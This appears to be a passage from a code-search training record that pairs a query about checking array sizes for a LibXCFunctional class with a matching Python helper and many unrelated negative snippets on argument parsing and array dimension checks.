ROOT.RooFit.Optimize ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , ROOT.RooArgSet ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , string_types ) \\\n and hasattr ( self , 'params' ) and a in self.params ( dataset ) : \n _v = self.params()[ a ]\n _s = ROOT.RooArgSet ( _v )\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) ) \n elif kup in ( 'MINOS' , ) and not isinstance ( a , string_types ) :\n\n _s = ROOT.RooArgSet()\n _pars = self.params ( dataset ) if hasattr ( self , 'params' ) else ROOT.RooArgSet() \n for v in a :\n if v in _pars and isinstance ( v , string_types ):\n _v = _pars [ v ] \n _s.add ( _v )\n elif v in _pars and isinstance ( v , ROOT.RooAbsArg ) :\n _s.add ( v )\n else :\n self.error ( \"Can not find %s in parameetrs\" % v )\n\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) )\n \n elif kup in ( 'SAVE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Save ( a ) )\n elif kup in ( 'CLONE' ,\n 'CLONEDATA' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.CloneData ( a ) )\n elif kup in ( 'OFFSET' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Offset ( a ) )\n elif kup in ( 'FITOPTIONS' ,\n 'FITOPTION' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.FitOptions ( a ) )\n \n elif kup in ( 'CONSTRAINT' ,\n 'CONSTRAINTS' ,\n 'PARS' ,\n 'PARAMS' ,\n 'PARAMETER' ,\n 'PARAMETERS' ) :\n c = self.parse_constraints ( a )\n if c is None : self.error ('parse_args: Invalid constraint specification: %s/%s' % ( a , type ( a ) ) )\n else : _args.append ( c ) \n \n else :\n \n self.error ( 'parse_args: Unknown/illegal keyword argument: %s/%s, skip it ' % ( k , type ( a ) ) )\n \n \n if not check_arg ( 'numcpu' , *_args ) :\n if dataset and not isinstance ( dataset , ROOT.RooDataHist ) :\n _args.append ( ncpu ( len ( dataset ) ) )\n else :\n nc = numcpu()\n if 1 < nc : _args.append ( ROOT.RooFit.NumCPU ( nc ) )\n\n \n # =============================================================\n ## check options for the weighted datasets \n if dataset :\n \n weighted = dataset.isWeighted () \n sw2 = check_arg ( 'SumW2Error' , *_args )\n aer = check_arg ( 'AsymptoticError' , *_args )\n\n if sw2 and aer :\n logger.warning ( \"parse_args: Both ``SumW2Error'' and ``AsymptoticError'' are specified\" ) \n if weighted and sw2 :\n value = bool ( sw2.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'SumW2=False' is specified for the weighted dataset!\")\n elif weighted and aer : \n value = bool ( aer.getInt( 0 ) )\n if not value : logger.warning (\"parse_args: 'AsymptoticError=False' is specified for the weighted dataset!\")\n ## elif weighted : \n ## logger.warning ( \"parse_args: Neither ``SumW2Error'' and ``AsymptoticError'' are specified for weighted dataset! ``SumW2=True'' is added\" )\n ## _args.append ( ROOT.RooFit.SumW2Error ( True ) ) \n elif not weighted and sw2 :\n logger.warning ( \"parse_args:``SumW2Error'' is specified for non-weighted dataset\" )\n elif not weighted and aer :\n logger.warning ( \"parse_args:``AsymptoticError'' is specified for non-weighted dataset\" )\n\n keys = [ str ( a ) for a in _args ]\n keys.sort ()\n \n ## check presence of \"non-trivial\" keys\n kset = set( keys ) \n kset.discard ( 'Save' ) ## trivial\n kset.discard ( 'NumCPU' ) ## trivial\n kset.discard ( 'Verbose' ) ## trivial \n kset.discard ( 'Timer' ) ## trivial \n kset.discard ( 'PrintLevel' ) ## trivial\n\n ## duplicates? \n if len ( kset ) != len ( keys ) :\n self.warning (\"duplicated options!\") \n #\n if kset : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n else : self.debug ( 'parse_args: Parsed arguments %s' % keys )\n\n\n ## store them \n self.aux_keep.append ( _args ) \n \n return self.merge_args ( 5 , *_args )", "def _preprocess_typecheck(argSig, argspecs, slf_or_clsm=False):\n # todo: Maybe move also slf-logic here\n vargs = argspecs.varargs\n try:\n kw = argspecs.keywords\n except AttributeError:\n kw = argspecs.varkw\n try:\n kwonly = argspecs.kwonlyargs\n except AttributeError:\n kwonly = None\n if not vargs is None or not kw is None:\n arg_type_lst = list(get_Tuple_params(argSig))\n if not vargs is None:\n vargs_pos = (len(argspecs.args)-1) \\\n if slf_or_clsm else len(argspecs.args)\n # IndexErrors in this section indicate that a child-method was\n # checked against a parent's type-info with the child featuring\n # a more wider type on signature level (e.g. adding vargs)\n try:\n vargs_type = typing.Sequence[arg_type_lst[vargs_pos]]\n except IndexError:\n vargs_type = typing.Sequence[typing.Any]\n try:\n arg_type_lst[vargs_pos] = vargs_type\n except IndexError:\n arg_type_lst.append(vargs_type)\n if not kw is None:\n kw_pos = len(argspecs.args)\n if slf_or_clsm:\n kw_pos -= 1\n if not vargs is None:\n kw_pos += 1\n if not kwonly is None:\n kw_pos += len(kwonly)\n try:\n kw_type = typing.Dict[str, arg_type_lst[kw_pos]]\n except IndexError:\n kw_type = typing.Dict[str, typing.Any]\n try:\n arg_type_lst[kw_pos] = kw_type\n except IndexError:\n arg_type_lst.append(kw_type)\n return typing.Tuple[tuple(arg_type_lst)]\n else:\n return argSig", "def OSCArgument(next):\n \n if type(next) == type(\"\"): \n OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4\n binary = struct.pack(\">%ds\" % (OSCstringLength), next)\n tag = \"s\"\n elif type(next) == type(42.5):\n binary = struct.pack(\">f\", next)\n tag = \"f\"\n elif type(next) == type(13):\n binary = struct.pack(\">i\", next)\n tag = \"i\"\n else:\n binary = \"\"\n tag = \"\"\n\n return (tag, binary)", "def type_command(ctx, name_from, name_to):", "def arguments(**kw):\n return export_arguments('cc', _all_arguments, _groups, **kw)", "def assign_dll_types(dll):\n dll = init_functions(dll)\n dll = exit_functions(dll)\n \n dll.Asap3GetVersion.argtypes = (ctypes.POINTER(version_t),)\n dll.Asap3GetVersion.restype = ctypes.c_bool\n\n # Asap3SetInteractiveMode\n dll.Asap3SetInteractiveMode.argtypes = (\n TAsap3Hdl,\n ctypes.c_bool,\n )\n dll.Asap3SetInteractiveMode.restype = ctypes.c_bool\n\n # Asap3GetInteractiveMode\n dll.Asap3GetInteractiveMode.argtypes = (\n TAsap3Hdl,\n ctypes.POINTER(ctypes.c_bool),\n )\n dll.Asap3GetInteractiveMode.restype = ctypes.c_bool\n\n \n # Asap3GetProjectDirectory\n dll.Asap3GetProjectDirectory.argtypes=(TAsap3Hdl, ctypes.POINTER(type(ctypes.create_string_buffer(b\"\", 255))), ctypes.POINTER(ctypes.c_ulong))\n dll.Asap3GetProjectDirectory.restype=ctypes.c_bool\n return dll", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse library type information.\")\n parser.add_argument(\"input_file\", help=\"Salmon library type information file.\")\n return parser.parse_args()", "def getTCSargs():\n try:\n nameIndex, portIndex = sys.argv.index(\"-n\"), sys.argv.index(\"-e\")\n if abs(nameIndex - portIndex) > 1:\n if isinstance(sys.argv[nameIndex+1],str) and isinstance(sys.argv[portIndex+1], int):\n return [sys.argv[nameIndex+1], int(sys.argv[portIndex+1])]\n except ValueError as error:\n return [\"localhost\", 58044]\n except IndexError as error:\n return [\"localhost\", 58044]\n return [\"localhost\", 58044]", "def convert_args(sys_argv, sys_word, sys_mat, sys_directions,\r\n wanted_directions):\r\n if len(sys_argv) != 5:\r\n print(PARAMETER_ERROR)\r\n elif os.path.isfile(sys_word) is False:\r\n print(WORD_ERROR + sys_word + MISSING_ERROR)\r\n elif os.path.isfile(sys_mat) is False:\r\n print(MATRIX_ERROR + sys_mat + MISSING_ERROR)\r\n elif directions_validity(sys_directions, wanted_directions) is False:\r\n print(DIRECTION_ERROR)\r\n else:\r\n return True", "def testcliparams(c, name=\"def\"):\n print(name)", "def main(**opts: tp.Any) -> None:", "def parseArgs ():\n independentBaseName = None\n dependentBaseName = None\n independentTSID = None\n dependentTSID = None\n statisticsFile = None\n nEquations = None\n logFile = None\n #\n # Loop through command line arguments\n for arg in sys.argv:\n parts = arg.split('=')\n if ( (parts == None) or (len(parts) != 2) ):\n # Not an arg=value command line argument\n continue\n argName = parts[0].upper()\n argValue = parts[1]\n if ( argName == 'DEPENDENTBASENAME' ):\n dependentBaseName = argValue\n elif ( argName == 'DEPENDENTTSID' ):\n dependentTSID = argValue\n elif ( argName == 'INDEPENDENTBASENAME' ):\n independentBaseName = argValue\n elif ( argName == 'INDEPENDENTTSID' ):\n independentTSID = argValue\n elif ( argName == 'LOGFILE' ):\n logFile = argValue\n elif ( argName == 'NUMBEROFEQUATIONS' ):\n nEquations = int(argValue)\n elif ( argName == 'STATISTICSFILE' ):\n statisticsFile = argValue\n return ( independentBaseName, dependentBaseName, independentTSID, dependentTSID,\n statisticsFile, nEquations, logFile )", "def parameterTypes(self, p_int): # real signature unknown; restored from __doc__\n return []", "def supported_table_args(self) -> t.Tuple[str, ...]:", "def get_args():\n parser = argparse.ArgumentParser(description='', prog='label.py')\n parser.add_argument('-v',\n '--version',\n action='version',\n version='%(prog)s {}'.format('version'))\n\n parser.add_argument('-t',\n '--template',\n metavar='<template>',\n type=str,\n help='')\n\n parser.add_argument('--printer',\n help='Printer')\n\n parser.add_argument('-s',\n '--string',\n action='store',\n help='Label Content')\n\n parser.add_argument('--listprinter',\n required=False,\n action='store_true',\n # metavar='',\n help='List Printer')\n parser.add_argument('--listtemplates',\n required=False,\n action='store_true',\n # metavar='',\n help='List templates')\n\n parser.add_argument('-p',\n action='store_true',\n help='preview')\n\n parser.add_argument('-P',\n '--printit',\n action='store_true',\n help='Print Label')\n\n parser.add_argument('-d',\n '--debug',\n action='store',\n # choices=['info', 'warning'],\n help='Debug mode')\n\n parser.add_argument('-a',\n '--amount',\n action='store',\n type=int,\n metavar='int',\n help='Print label n times')\n\n parser.add_argument('-c',\n required=False,\n action='store_true',\n help='clean up temp files')\n\n\n# parser.add_argument('-C',\n# '--conf',\n# required=False,\n# action='store_true',\n# help='Load another conf file')\n\n args = parser.parse_args()\n\n printer = args.printer\n textemplate = args.template\n string = args.string\n printers = args.listprinter\n preview = args.p\n printit = args.printit\n debug = args.debug\n amount = args.amount\n cleanup = args.c\n templates = args.listtemplates\n\n return printer, textemplate, string, printers, preview, printit, debug, amount, cleanup, templates", "def parser_arguments():\n parser = argparse.ArgumentParser(prog = 'OIDv6_ToolKit',\n usage = 'python3 %(prog)s [command] --classe [option] --limit [option] --location [option]',\n description='This programm allows to download images from OIDv6')\n parser.add_argument(\"command\",\n metavar= \"<command>: 'getURL', 'downloader' or 'listClasses'.\",\n help = \"'getURL' or 'listClasses'.\")\n parser.add_argument('--classes', required=False, nargs='+',\n metavar=\"list of classes\",\n help=\"Sequence of 'strings' of the wanted classes\")\n parser.add_argument('--limit', required=False, type=int, default=None,\n metavar=\"integer number\",\n help='Optional limit on number of images to download')\n parser.add_argument('--location',required=False, nargs='+',\n metavar='where to download',\n help=\"where to download: local repository or Minio serveur\")\n\n args = parser.parse_args()\n return args", "def svn_client_args_to_target_array(apr_array_header_t_targets_p, apr_getopt_t_os, apr_array_header_t_known_targets, svn_client_ctx_t_ctx, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def get_argumets():\n\n parser = argparse.ArgumentParser( description='Interactive 6DoF pose annotator')\n parser.add_argument('--cimg', type=str, default='data/rgb.png',\n help='file name of the RGB image of the input scene.')\n parser.add_argument('--dimg', type=str, default='data/depth.png',\n help='file name of the depth image of the input scene. We assume that RGB and depth image have pixel-to-pixel correspondence.')\n parser.add_argument('--intrin', type=str, default='data/realsense_intrinsic.json',\n help='file name of the camera intrinsic.')\n parser.add_argument('--model', type=str, default='data/hammer_mm.ply',\n help='file name of the object model (.pcd or .ply).')\n parser.add_argument('--init', type=str, default='data/init.json',\n help='file name of the initial transformation (.json).')\n \n return parser.parse_args()", "def get_args():\r\n\r\n ap = argparse.ArgumentParser(add_help=False,\r\n description='Arguments for training Goturn Tracker')\r\n ap.add_argument('--npus', type=int, default=1,\r\n help='number of npus, 0: means no npu, -1 to use all \\\r\n npus, 1 = use one npu, 2 = use two npus')\r\n ap.add_argument('--device', type=int, default=0, help='which npu to train')\r\n # Data settings\r\n ap.add_argument('--imagenet_path', type=str,\r\n required=True, help='path to imagenet folder, this \\\r\n folder shoud have images and gt folder')\r\n ap.add_argument('--alov_path', type=str,\r\n required=True, help='path to ALOV folder, this \\\r\n folder should have images and gt folder')\r\n\r\n # architecture and hyperparameters\r\n ap.add_argument('--arch', default='alexnet',\r\n choices={'alexnet'}, help='model architecture, \\\r\n default: alexnet, currently only alexnet is \\\r\n supported')\r\n ap.add_argument('--pretrained_model',\r\n default='../goturn/models/pretrained/alexnet.pth.tar',\r\n help='Path to pretrained model')\r\n ap.add_argument('--epochs', default=90,\r\n type=int, help='number of total epochs to run')\r\n ap.add_argument('--batch_size', default=3,\r\n type=int, help='number of images per batch')\r\n ap.add_argument('--max_steps', default=None,\r\n type=int, help='number of total steps to run')\r\n\r\n # Optimizer settings\r\n ap.add_argument('--lr', default=1e-6, type=float,\r\n help='initial learning rate', dest='lr')\r\n ap.add_argument('--momentum', default=0.9, type=float, help='momentum')\r\n ap.add_argument('--wd', default=5e-4, type=float, help='weight decay (default: 5e-4)',\r\n dest='wd')\r\n ap.add_argument('--lr_step', default=1, type=int,\r\n help='Number of epoch after which we change the learning rate',\r\n dest='lr_step')\r\n ap.add_argument('--gamma', default=0.1, type=float,\r\n help='multiplicative factor for learning rate',\r\n dest='gamma')\r\n\r\n # reproducibility\r\n ap.add_argument('--seed', type=int, default=42, help='seed value')\r\n # ap.add_argument('--seed', type=int, default=800, help='seed value')\r\n\r\n # save path\r\n ap.add_argument('--save_path', default=\".\", type=str, help='path to save output')\r\n\r\n # goturn specific arguments\r\n ap = GoturnTrain.add_model_specific_args(ap)\r\n return ap.parse_args()", "def prepare_arguments(self, ftyp, args):\n # Determine fixed and variable arguments:\n if ftyp.is_vararg:\n fixed_amount = len(ftyp.arguments)\n fixed_args = args[:fixed_amount]\n var_args = args[fixed_amount:]\n else:\n fixed_args = args\n var_args = []\n\n # Evaluate arguments:\n ir_arguments = []\n\n # If return value is complex, reserve room for it an pass pointer\n if ftyp.return_type.is_struct:\n size, alignment = self.data_layout(ftyp.return_type)\n rval_alloc = self.emit(ir.Alloc(\"rval_alloc\", size, alignment))\n rval_ptr = self.emit(ir.AddressOf(rval_alloc, \"rval_ptr\"))\n ir_arguments.append(rval_ptr)\n else:\n rval_alloc = None\n\n # Place other arguments:\n for argument in fixed_args:\n value = self.gen_expr(argument, rvalue=True)\n ir_arguments.append(value)\n\n # Handle variable arguments:\n if ftyp.is_vararg:\n vararg_ptr = self.gen_fill_varargs(var_args)\n ir_arguments.append(vararg_ptr)\n else:\n assert not var_args\n\n return ir_arguments, rval_alloc", "def Args(parser):\n parser.add_argument('name', help='Type name.')\n parser.add_argument('--provider',\n help='Type provider name or its self-link.',\n required=True)", "def _build_instance_count_and_type_args(self, master_instance_type,\r\n slave_instance_type, num_instances):\r\n params = {\r\n 'Instances.MasterInstanceType' : master_instance_type,\r\n 'Instances.SlaveInstanceType' : slave_instance_type,\r\n 'Instances.InstanceCount' : num_instances,\r\n }\r\n return params", "def convert_args(self):\n try:\n spec = _action_args_dict[self.action]\n except KeyError:\n raise Exception('Invalid action: ' + str(action))\n\n def parse_arg(type_, token, name):\n \"\"\"Converts token to type type_.\n \n This includes special cases for some argument types,\n such as Card, bool, and NoneType.\n \"\"\"\n if type_ is Card and token is not None and type(token) is not Card:\n try:\n arg = Card(int(token))\n except ValueError:\n raise GameActionError(\n 'Error converting \"{0}\" argument: {1} token: \"{2}\"'\n .format(name, str(type_), token))\n\n return arg\n\n else:\n return token\n\n\n req_tokens = self.args[:spec.n_req_args]\n req_args = []\n\n for i, tok, (typ, name) in izip(count(), req_tokens, spec.required_arg_specs):\n try:\n arg = parse_arg(typ, tok, name)\n except GameActionError, e:\n # If we failed in parse_arg, message can be appended for details\n raise\n #raise GameActionError(\n # 'Could not convert argument {0}. '.format(i) + e.message)\n\n req_args.append(arg)\n\n\n extended_tokens = self.args[spec.n_req_args:]\n extended_args = []\n \n for i, tok in izip(count(spec.n_req_args), extended_tokens):\n typ, name = spec.extended_arg_spec\n try:\n arg = parse_arg(typ, tok, name)\n except GameActionError, e:\n # If we failed in parse_arg, message can be appended for details\n raise GameActionError(\n 'Could not convert argument {0}. '.format(i) + e.message)\n\n extended_args.append(arg)\n\n self.args = req_args + extended_args" ]
[ "0.6376518", "0.58763367", "0.58502054", "0.5712465", "0.5642069", "0.5633545", "0.56088585", "0.5531215", "0.5515016", "0.550904", "0.5504691", "0.5500384", "0.54895383", "0.5458106", "0.5442237", "0.53984636", "0.5386691", "0.5374875", "0.53544724", "0.5347694", "0.5341656", "0.5330729", "0.53167206", "0.5298466", "0.5288069", "0.52814376", "0.52719194", "0.526808", "0.52661186", "0.5257266", "0.5256252", "0.52499235", "0.52421695", "0.523948", "0.523786", "0.5237173", "0.52351606", "0.5231834", "0.5213423", "0.52131355", "0.52026385", "0.5200033", "0.519791", "0.51948047", "0.51936597", "0.5186599", "0.5185236", "0.5180686", "0.51777995", "0.5166358", "0.51543736", "0.5147955", "0.5145749", "0.5133823", "0.5129392", "0.51238716", "0.51147854", "0.51145244", "0.5110281", "0.5109531", "0.510757", "0.5102361", "0.5097067", "0.50943106", "0.508866", "0.5081127", "0.50780606", "0.5077894", "0.50702566", "0.5067872", "0.50627697", "0.5062611", "0.5054169", "0.5051104", "0.50454617", "0.50450784", "0.50415426", "0.5041265", "0.50393766", "0.5031265", "0.50303197", "0.50258565", "0.50234544", "0.50225246", "0.50221205", "0.5021005", "0.5015285", "0.50094754", "0.5008192", "0.499918", "0.4993761", "0.49935496", "0.4991666", "0.49890697", "0.49875504", "0.49862432", "0.49857524", "0.49854046", "0.49840266", "0.49835166" ]
0.6243665
1
A specialized function built to construct and check the sizes of arrays given to the LibXCFunctional class.
def _check_arrays(current_arrays, fields, sizes, factor, required): # Nothing supplied so we build it out if current_arrays is None: current_arrays = {} for label in fields: if required: size = sizes[label] current_arrays[label] = np.zeros((factor, size)) else: current_arrays[label] = None # np.empty((1)) return current_arrays
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _checkSize(X1,X2):\n \n if len(X1) != len(X2):\n raise ValueError, 'Lists are differnt lengths'", "def check_array_shape(logger, arr, name, expected_shape):\n shape = arr.shape\n check_array_ndim(arr, name, len(expected_shape))\n for i in range(len(shape)):\n check_array_dim(logger, arr, name, expected_shape[i], i)\n\n return arr", "def _validate_elem_length(max_num_levels, elems_flat, axis):\n assertions = []\n\n elem_length = ps.shape(elems_flat[0])[axis]\n\n # The default size limit will overflow a 32-bit int, so make sure we're\n # using 64-bit.\n size_limit = 2**(ps.cast(max_num_levels, np.int64) + 1)\n enough_levels = ps.less(ps.cast(elem_length, np.int64), size_limit)\n enough_levels_ = tf.get_static_value(enough_levels)\n if enough_levels_ is None:\n assertions.append(\n tf.debugging.assert_equal(\n enough_levels, True,\n message='Input `Tensor`s must have dimension less than'\n ' `2**(max_num_levels + 1)` along `axis=={}`.'\n ' (saw: {} which is not less than 2**{} == {})'.format(\n axis,\n elem_length,\n max_num_levels,\n size_limit)))\n elif not enough_levels_:\n raise ValueError(\n 'Input `Tensor`s must have dimension less than'\n ' `2**(max_num_levels + 1)` along `axis == {}`'\n ' (saw: {} which is not less than 2**{} == {})'.format(\n axis,\n elem_length,\n max_num_levels,\n size_limit))\n\n is_consistent = ps.reduce_all([ps.equal(ps.shape(elem)[axis], elem_length)\n for elem in elems_flat[1:]])\n\n is_consistent_ = tf.get_static_value(is_consistent)\n if is_consistent_ is None:\n assertions.append(\n tf.debugging.assert_equal(\n is_consistent, True,\n message='Inputs must have the same size along the given axis.'\n ' (saw: {})'.format([elem.shape for elem in elems_flat])))\n elif not is_consistent_:\n raise ValueError(\n 'Inputs must have the same size along the given axis.'\n ' (saw: {})'.format([elem.shape for elem in elems_flat]))\n return elem_length, assertions", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to the size of a dimension of another Numpy array [pedantic] (3) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 'rows', 'columns', pedantic=1, add=1)\n\n RxCSObject.parameter1 = np.random.randn(4, 3, 4)\n RxCSObject.aParameter1 = np.random.randn(3, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_batch_size_pack_size():", "def size(*args):", "def test_iterable_len(self):\n for iterable_len, expected_size in [(5, 5), (150, 100), (None, 100)]:\n with self.subTest(iterable_len=iterable_len):\n iterable_of_args, iterable_len_, chunk_size, n_splits = apply_numpy_chunking(\n self.test_data_numpy, iterable_len=iterable_len, n_splits=1\n )\n\n # Materialize generator and test contents\n iterable_of_args = list(iterable_of_args)\n self.assertEqual(len(iterable_of_args), 1)\n self.assertIsInstance(iterable_of_args[0][0], np.ndarray)\n np.testing.assert_array_equal(iterable_of_args[0][0], self.test_data_numpy[:expected_size])\n\n # Test other output\n self.assertEqual(iterable_len_, 1)\n self.assertEqual(chunk_size, 1)\n self.assertIsNone(n_splits)", "def test_size_check(self):\n [x1, y1, s1, g1] = self.data.diffusion_data.shape\n [x2, y2, s2, g2] = module_05.run_module(self.data).diffusion_data.shape\n self.assertEqual(x1, x2)\n self.assertEqual(y1, y2)\n self.assertEqual(s1, s2)\n self.assertEqual(g1, g2)", "def test_allowed_arg_sizes(submit_function_and_get_result, endpoint, size):\n r = submit_function_and_get_result(\n endpoint, func=large_arg_consumer, func_args=(bytearray(size),)\n )\n assert r.result == size", "def __DimSiz_restriction_correct_ndarray_ndarray3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array (3) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimH('parameter1', 'aParameter1', 'pages', 'pages', mul=2)\n\n RxCSObject.parameter1 = np.random.randn(10, 3, 4) # *5 pages, 3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # *4 pages, 3 rows, 1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_number_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_check_X_too_many_dims():\n with pytest.raises(ValueError):\n check_X(np.ones((5,4,3)))", "def __DimSiz_restriction_correct_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (2) [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(10, 3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_ncols_gtiff_array(self):\n self.assertEqual(_test_array(landsat_gtiff).shape[2], 235)", "def check_consistent_length(arrays: Sequence[npt.ArrayLike]) -> None:\n lengths = [_num_samples(X) for X in arrays if X is not None]\n uniques = np.unique(lengths)\n if len(uniques) > 1:\n raise ValueError(\n \"Found input variables with inconsistent numbers of\" \" samples: %r\" % [int(length) for length in lengths]\n )", "def __DimSiz_restriction_correct_ndarray_number2(self):\n\n strTestName = 'The number of columns of a Numpy array lower or equal to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 3, 'columns')\n\n RxCSObject.parameter1 = np.random.randn(3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def lengths(x: Any) -> IntOrIter:\n if is_scalar(x):\n return Array([1], dtype=numpy.int_)\n return Array([length(elem) for elem in x], dtype=numpy.int_)", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to the size of a dimension of another Numpy array [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 'aParameter1', 'pages', 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(2, 3, 4) # * 12 pages, 3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # 4 pages, * 3 rows, 1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def get_length(array):\n return len(list(array))", "def _CheckLengthOrExpand(param_per_dataset, expected_len, param_name):\n if param_per_dataset is None:\n return None\n if isinstance(param_per_dataset, list):\n if len(param_per_dataset) != expected_len:\n raise ValueError(f'{param_name} doesn\\'t match the size of '\n f'eval_dataset_names: {len(param_per_dataset)} vs '\n f'{expected_len}.')\n else:\n param_per_dataset = [param_per_dataset] * expected_len\n return param_per_dataset", "def ndarray_size(self) -> int:\n pass", "def test_ncols_vrt_array(self):\n self.assertEqual(_test_array(landsat_vrt).shape[2], 235)", "def arraySize( cls, value, typeCode = None ):\n return value.size", "def test_array(self):\n htype = h5t.py_create(('f',(2,2)))\n self.assertIsInstance(htype, h5t.TypeArrayID)\n self.assertEqual(htype.get_array_dims(), (2,2))", "def __len__():", "def __len__():", "def __len__():", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array [pedantic] (2) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimH('parameter1', 'aParameter1', 'pages', 'columns', pedantic=1, add=1)\n\n RxCSObject.parameter1 = np.random.randn(4, 3, 4) # *3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(3, 2) # 3 rows, * 2 columns\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def __sizeof__(*args):", "def test_list_of_equal_len():\n\n @type_checked\n def _run_test(something:[str, int, bool]):\n assert isinstance(something[0], str)\n assert isinstance(something[1], int)\n assert isinstance(something[2], bool)\n\n _run_test(something=[None, \"12\", 1])", "def __DimSiz_restriction_correct_ndarray_parameter_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a parameter [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('iParameter1', 'Int parameter')\n RxCSObject.paramType('iParameter1', int)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 'iParameter1', 'rows', pedantic=1)\n\n RxCSObject.iParameter1 = 10\n RxCSObject.parameter1 = np.random.randn(2, 4, 7)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def 